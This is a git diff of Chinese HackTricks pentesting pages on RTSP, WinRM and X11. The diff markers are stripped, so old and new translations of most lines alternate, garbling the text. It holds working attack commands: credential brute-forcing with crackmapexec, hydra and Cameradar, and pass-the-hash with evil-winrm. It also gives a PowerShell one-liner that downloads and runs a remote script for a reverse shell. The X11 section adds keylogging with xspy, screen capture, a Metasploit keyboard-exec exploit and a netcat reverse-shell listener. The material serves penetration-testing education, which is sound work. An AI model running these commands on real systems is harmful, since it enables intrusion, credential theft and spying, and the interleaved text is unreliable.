> 流数据的传输本身不是 RTSP 的任务。大多数 RTSP 服务器使用实时传输协议 (RTP) 结合实时控制协议 (RTCP) 进行媒体流传输。然而一些供应商实现了专有的传输协议。例如RealNetworks 的 RTSP 服务器软件也使用 RealNetworks 的专有实时数据传输 (RDT)
**默认端口:** 554, 8554
**默认端口:** 554,8554
```
PORT STATE SERVICE
554/tcp open rtsp
```
## 关键细节
## Key Details
**RTSP** 类似于 HTTP但专门设计用于媒体流。它在一份简单的规范中定义,可以在这里找到:
**RTSP** 类似于 HTTP但专门为媒体流设计。它在一个简单的规范中定义,可以在这里找到:
[RTSP RFC2326](https://tools.ietf.org/html/rfc2326)
设备可能允许**未经身份验证**或**经过身份验证**的访问。要检查,会发送一个 "DESCRIBE" 请求。下面是一个基本示例:
设备可能允许 **unauthenticated****authenticated** 访问。要检查,发送一个 "DESCRIBE" 请求。下面是一个基本示例:
`DESCRIBE rtsp://<ip>:<port> RTSP/1.0\r\nCSeq: 2\r`
请记住,正确的格式包括一个双 "\r\n" 以获得一致的响应。"200 OK" 响应表示**未经身份验证**的访问,而 "401 Unauthorized" 表示需要进行身份验证,揭示了是否需要**基本身份验证**或**摘要身份验证**
请记住,正确的格式包括一个双 "\r\n" 以确保一致的响应。"200 OK" 响应表示 **unauthenticated access**,而 "401 Unauthorized" 则表示需要身份验证,揭示是否需要 **Basic****Digest authentication**
对于**基本身份验证**,您需要将用户名和密码进行 base64 编码,并将其包含在请求中,如下所示:
对于 **Basic authentication**,您将用户名和密码编码为 base64,并将其包含在请求中,如下所示:
`DESCRIBE rtsp://<ip>:<port> RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r`
此示例使用 "admin" 和 "1234" 作为凭据。以下是一个用于发送此类请求的**Python 脚本**
此示例使用 "admin" 和 "1234" 作为凭据。以下是一个 **Python script** 用于发送这样的请求
```python
import socket
req = "DESCRIBE rtsp://<ip>:<port> RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n\r\n"
@ -53,13 +54,13 @@ s.sendall(req)
data = s.recv(1024)
print(data)
```
**基本身份验证**更简单且更受青睐。**摘要身份验证**需要小心处理“401未经授权”响应中提供的身份验证详细信息
**基本认证** 更简单且更受欢迎。 **摘要认证** 需要仔细处理在 "401 Unauthorized" 响应中提供的认证细节
本概述简化了访问RTSP流的过程重点介绍了**基本身份验证**,因为在最初尝试中,它更简单且实用。
此概述简化了访问 RTSP 流的过程,重点关注 **基本认证**,因为它在初始尝试中简单且实用。
## 枚举
获取有关支持的有效方法和URL的信息并尝试暴力破解访问如果需要以访问内容
获取有关有效方法和支持的 URL 的信息,并尝试暴力破解访问(如有必要)以获取内容访问权限
```bash
nmap -sV --script "rtsp-*" -p <PORT> <IP>
```
@ -67,34 +68,35 @@ nmap -sV --script "rtsp-*" -p <PORT> <IP>
### **其他有用的程序**
用于暴力破解:[https://github.com/Tek-Security-Group/rtsp\_authgrinder](https://github.com/Tek-Security-Group/rtsp\_authgrinder)
进行暴力破解: [https://github.com/Tek-Security-Group/rtsp\_authgrinder](https://github.com/Tek-Security-Group/rtsp\_authgrinder)
[**Cameradar**](https://github.com/Ullaakut/cameradar)
* 检测任何可访问目标上的开放RTSP主机
* 检测任何可访问目标上的开放 RTSP 主机
* 获取它们的公共信息(主机名、端口、摄像头型号等)
* 启动自动字典攻击以获取它们的流路由(例如/live.sdp
* 启动自动字典攻击以获取它们的流路径(例如 /live.sdp
* 启动自动字典攻击以获取摄像头的用户名和密码
* 从中生成缩略图,以检查流是否有效并快速预览其内容
* 尝试创建一个Gstreamer管道以检查它们是否被正确编码
* 打印Cameradar能获取的所有信息的摘要
* 从中生成缩略图,以检查流是否有效并快速预览其内容
* 尝试创建 Gstreamer 管道以检查它们是否正确编码
* 打印 Cameradar 能获取的所有信息的摘要
## 参考资料
## 参考文献
* [https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol](https://en.wikipedia.org/wiki/Real\_Time\_Streaming\_Protocol)
* [http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/](http://badguyfu.net/rtsp-brute-forcing-for-fun-and-naked-pictures/)
* [https://github.com/Ullaakut/cameradar](https://github.com/Ullaakut/cameradar)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

142
network-services-pentesting/5985-5986-pentesting-winrm.md
View file

@ -1,77 +1,86 @@
# 5985,5986 - 渗透测试 WinRM
# 5985,5986 - Pentesting WinRM
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或**关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激挑战的内容
参与深入探讨黑客的刺激挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
随时了解最新的赏金计划发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy)立即与顶尖黑客合作!
**今天就加入我们,进入** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作!
## WinRM
[Windows 远程管理WinRM](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) 是微软强调的一种**协议**,通过 HTTP(S) 实现对 Windows 系统的**远程管理**在此过程中利用 SOAP。它基本上由 WMI 提供支持,呈现为 WMI 操作的基于 HTTP 的接口。
[Windows 远程管理 (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) 被微软强调为一种 **协议**,它通过 HTTP(S) 实现 **Windows 系统的远程管理**,并在此过程中利用 SOAP。它基本上由 WMI 提供支持,呈现为 WMI 操作的基于 HTTP 的接口。
在计算机上存在 WinRM 可以通过 PowerShell 进行简单的远程管理,类似于 SSH 在其他操作系统中的工作方式。要确定 WinRM 是否可用,建议检查是否打开了特定端口
WinRM 在机器上的存在允许通过 PowerShell 进行简单的远程管理,类似于 SSH 在其他操作系统中的工作方式。要确定 WinRM 是否正常运行,建议检查特定端口的开放情况
* **5985/tcpHTTP**
* **5986/tcpHTTPS**
* **5985/tcp (HTTP)**
* **5986/tcp (HTTPS)**
上述列表中的开放端口表示已设置 WinRM因此允许尝试启动远程会话。
上述列表中的开放端口表示 WinRM 已被设置,从而允许尝试启动远程会话。
### **启动 WinRM 会话**
要为 WinRM 配置 PowerShell需要使用微软的 `Enable-PSRemoting` 命令,设置计算机以接受远程 PowerShell 命令。通过提升的 PowerShell 访问权限,可以执行以下命令以启用此功能并将任何主机指定为受信任
要为 WinRM 配置 PowerShell微软的 `Enable-PSRemoting` cmdlet 将发挥作用,设置计算机以接受远程 PowerShell 命令。通过提升的 PowerShell 访问权限,可以执行以下命令以启用此功能并将任何主机指定为受信任:
```powershell
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
```
这种方法涉及向`trustedhosts`配置添加通配符,这一步骤需要谨慎考虑,因为它可能带来一些影响。还指出,可能需要将攻击者的机器上的网络类型从“公用”更改为“工作”。
这种方法涉及`trustedhosts` 配置中添加通配符,这一步骤需要谨慎考虑其影响。还需要注意的是,可能需要将攻击者机器上的网络类型从“公共”更改为“工作”。
此外,可以使用`wmic`命令**远程激活**WinRM示如下:
此外,可以使用 `wmic` 命令**远程激活** WinRM如下:
```powershell
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
```
这种方法允许远程设置WinRM增强了远程管理Windows机器的灵活性。
这种方法允许远程设置 WinRM从而增强了远程管理 Windows 机器的灵活性。
### 测试配置
### 测试是否已配置
要验证攻击机器的设置,使用`Test-WSMan`命令检查目标是否正确配置了WinRM。通过执行此命令您应该期望收到有关协议版本和wsmid的详细信息表明配置成功。以下是演示已配置目标与未配置目标预期输出示例:
要验证攻击机器的设置,使用 `Test-WSMan` 命令检查目标是否正确配置了 WinRM。通过执行此命令您应该期望收到有关协议版本和 wsmid 的详细信息,指示配置成功。以下是演示已配置目标与未配置目标预期输出示例:
* 对于已正确配置的目标,输出将类似于:
* 对于一个 **** 正确配置的目标,输出将类似于:
```bash
Test-WSMan <target-ip>
```
响应应包含有关协议版本和wsmid的信息表明WinRM已正确设置。
![](<../.gitbook/assets/image (582).png>)
* 相反,对于**未**配置WinRM的目标将不会返回此类详细信息突显出缺乏适当的WinRM设置。
![](<../.gitbook/assets/image (458).png>)
### 执行命令
要在目标机器上远程执行 `ipconfig` 并查看其输出,请执行:
要在目标机器上远程执行`ipconfig`并查看其输出,请执行:
```powershell
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
```
![](<../.gitbook/assets/image (151).png>)
您还可以通过**Invoke-Command**执行当前PS控制台的命令。假设您本地有一个名为**enumeration**的函数,并且您想在远程计算机上执行它,您可以这样做:
您还可以通过 _**Invoke-Command**_ **在当前 PS 控制台中执行命令**。假设您在本地有一个名为 _**enumeration**_ 的函数,并且您想要 **在远程计算机上执行它**,您可以这样做:
```powershell
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
```
@ -79,13 +88,13 @@ Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration}
```powershell
Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
```
### 获取反向Shell
### 获取反向 shell
```powershell
Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
```
### 获取一个 PS 会话
### 获取 PS 会话
要获取一个交互式 PowerShell shell请使用 `Enter-PSSession`
要获取交互式 PowerShell shell请使用 `Enter-PSSession`
```powershell
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
@ -104,17 +113,17 @@ Exit-PSSession # This will leave it in background if it's inside an env var (New
```
![](<../.gitbook/assets/image (1009).png>)
**会话将在“受害者”内部的新进程wsmprovhost中运行**
**会话将在“受害者”内部的一个新进程wsmprovhost中运行**
### **强制打开 WinRM**
要使用 PS 远程和 WinRM但计算机未配置您可以使用以下命令启用
要使用 PS Remoting 和 WinRM但计算机未配置可以通过以下方式启用它
```powershell
.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
```
### 保存和恢复会话
在远程计算机中的语言受限时**无法工作**
**将不起作用** 如果远程计算机中的 **语言****限制**
```powershell
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
@ -126,41 +135,41 @@ $sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessi
#And restore it at any moment doing
Enter-PSSession -Session $sess1
```
这个会话中,您可以使用 _Invoke-Command_ 加载 PowerShell 脚本。
会话中,您可以使用 _Invoke-Command_ 加载 PS 脚本。
```powershell
Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1
```
### 错误
如果您遇到以下错误:
如果您发现以下错误:
`enter-pssession : 连接到远程服务器 10.10.10.175 失败并显示以下错误消息WinRM 客户端无法处理该请求。如果身份验证方案与 Kerberos 不同,或者客户端计算机未加入域,则必须使用 HTTPS 传输,或者必须将目标计算机添加到 TrustedHosts 配置设置中。请使用 winrm.cmd 配置 TrustedHosts。请注意TrustedHosts 列表中的计算机可能未经过身份验证。您可以通过运行以下命令获取有关此信息的更多信息winrm help config。有关更多信息请参阅 about_Remote_Troubleshooting 帮助主题。`
`enter-pssession : Connecting to remote server 10.10.10.175 failed with the following error message : The WinRM client cannot process the request. If the authentication scheme is different from Kerberos, or if the client computer is not joined to a domain, then HTTPS transport must be used or the destination machine must be added to the TrustedHosts configuration setting. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. You can get more information about that by running the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic.`
请在客户端尝试(信息来自[这里](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)
尝试在客户端(信息来自 [这里](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server))
```ruby
winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'
```
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客行为的刺激和挑战的内容
**黑客洞察**\
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
了解最新的赏金任务发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作!
**今天就加入我们,** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶级黑客开始合作!
## 在Linux中建立WinRM连接
## 在Linux中连接WinRM
### 暴力破解
注意对WinRM进行暴力破解可能会导致用户被阻止
请小心暴力破解winrm可能会阻止用户
```ruby
#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
@ -176,25 +185,27 @@ crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionT
```ruby
gem install evil-winrm
```
阅读其 github 上的**文档**[https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm)
阅读其 GitHub 上的 **documentation**: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm)
```ruby
evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.' -i <IP>/<Domain>
```
要使用 evil-winrm 连接到一个 IPv6 地址,在 /etc/hosts 中创建一个条目,将一个域名设置为该 IPv6 地址,并连接到该域名。
要使用 evil-winrm 连接到 **IPv6 地址**,在 _**/etc/hosts**_ 中创建一个条目,将 **域名** 设置为 IPv6 地址并连接到该域名。
### 使用 evil-winrm 传递哈希
```ruby
evil-winrm -u <username> -H <Hash> -i <IP>
```
![](<../.gitbook/assets/image (680).png>)
### 使用 PS-docker 机器
```
docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds
```
### 使用一个 Ruby 脚本
### 使用 Ruby 脚本
**从这里提取的代码:** [**https://alamot.github.io/winrm\_shell/**](https://alamot.github.io/winrm\_shell/)
**代码摘自这里:** [**https://alamot.github.io/winrm\_shell/**](https://alamot.github.io/winrm\_shell/)
```ruby
require 'winrm-fs'
@ -252,7 +263,7 @@ end
* `port:5985 Microsoft-HTTPAPI`
## 参考资料
## 参考
* [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
@ -293,33 +304,32 @@ Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}
```
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客行为的刺激和挑战的内容
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
随时了解最新的赏金任务发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作吧!
**今天就加入我们,** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作!
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为英雄使用</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

98
network-services-pentesting/6000-pentesting-x11.md
View file

@ -1,53 +1,54 @@
# 6000 - 渗透测试 X11
# 6000 - Pentesting X11
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上**关注我们。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客行为的刺激和挑战的内容
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
了解最新的赏金计划发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy)立即与顶尖黑客合作!
**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作
## 基本信息
**X 窗口系统**X是一种多功能的窗口系统在基于 UNIX 的操作系统上广泛使用。它提供了一个框架,用于创建图形**用户界面GUI**,各个程序处理用户界面设计。这种灵活性允许在 X 环境中获得多样化和可定制的体验。
**X 窗口系统** (X) 是一种在基于 UNIX 的操作系统上广泛使用的多功能窗口系统。它提供了创建图形 **用户界面 (GUIs)** 的框架,各个程序处理用户界面设计。这种灵活性允许在 X 环境中实现多样化和可定制的体验。
**默认端口:**6000
**默认端口:** 6000
```
PORT STATE SERVICE
6000/tcp open X11
```
## 枚举
## Enumeration
检查**匿名连接:**
检查 **匿名连接:**
```bash
nmap -sV --script x11-access -p <PORT> <IP>
msf> use auxiliary/scanner/x11/open_x11
```
#### 本地枚举
用户主目录中的文件 **`.Xauthority`** 被 **X11 用于授权**。来自 [**这里**](https://stackoverflow.com/a/37367518):
文件 **`.Xauthority`** 在用户的主文件夹中**X11用于授权**。来自 [**这里**](https://stackoverflow.com/a/37367518):
```bash
$ xxd ~/.Xauthority
00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d ............0..M
@ -55,10 +56,10 @@ $ xxd ~/.Xauthority
00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58 1...R.~..A.....X
00000030: 041d ef ...
```
> MIT-magic-cookie-1: 生成128位密钥“cookie”将其存储在\~/.Xauthority或XAUTHORITY环境变量指向的位置。客户端以明文形式将其发送到服务器服务器检查是否有此“cookie”的副本如果有则允许连接。密钥由DMX生成。
> MIT-magic-cookie-1生成128位密钥“cookie”将其存储在 \~/.Xauthority或 XAUTHORITY 环境变量指向的位置)。客户端将其以明文形式发送给服务器服务器检查是否有此“cookie”的副本如果有则允许连接。密钥由 DMX 生成。
{% hint style="warning" %}
为了**使用cookie**,您应该设置环境变量:**`export XAUTHORITY=/path/to/.Xauthority`**
为了**使用 cookie**,您应该设置环境变量:**`export XAUTHORITY=/path/to/.Xauthority`**
{% endhint %}
#### 本地枚举会话
@ -75,11 +76,11 @@ user tty7 :0 13Oct23 76days 13:37 2.20s xfce4-session
xdpyinfo -display <ip>:<display>
xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0
```
## 键盘记录
## Keyloggin
使用[xspy](http://tools.kali.org/sniffingspoofing/xspy)来嗅探键盘按键
[xspy](http://tools.kali.org/sniffingspoofing/xspy) 用于嗅探键盘输入
示例输出:
Sample Output:
```
xspy 10.9.xx.xx
@ -92,15 +93,15 @@ qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDo
xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
convert screenshot.xwd screenshot.png
```
## 远程桌面查看
## 远程桌面视图
来源[https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
来源: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
```
./xrdp.py <IP:0>
```
来源:[https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
Way from: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
首先,我们需要使用 xwininfo 命令来查找窗口的 ID。
首先,我们需要使用 xwininfo 找窗口的 ID。
```
xwininfo -root -display 10.9.xx.xx:0
@ -134,25 +135,25 @@ Corners: +0+0 -0+0 -0-0 +0-0
./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45
```
## 获取Shell
## 获取 Shell
```
msf> use exploit/unix/x11/x11_keyboard_exec
```
另一种方法
其他方式
**反向Shell** Xrdp还允许通过Netcat获取反向Shell。入以下命令:
**反向Shell** Xrdp还允许通过Netcat获取反向Shell。入以下命令:
```bash
./xrdp.py \<IP:0> no-disp
```
在界面中,您可以看到**R-shell选项**。
在界面中,您可以看到 **R-shell 选项**
然后,在本地系统上的端口5555上启动一个**Netcat监听器**
然后,在您的本地系统上端口 5555 启动一个 **Netcat 监听器**
```bash
nc -lvp 5555
```
然后,在**R-Shell**选项中放入您的IP地址和端口然后点击**R-shell**获取shell
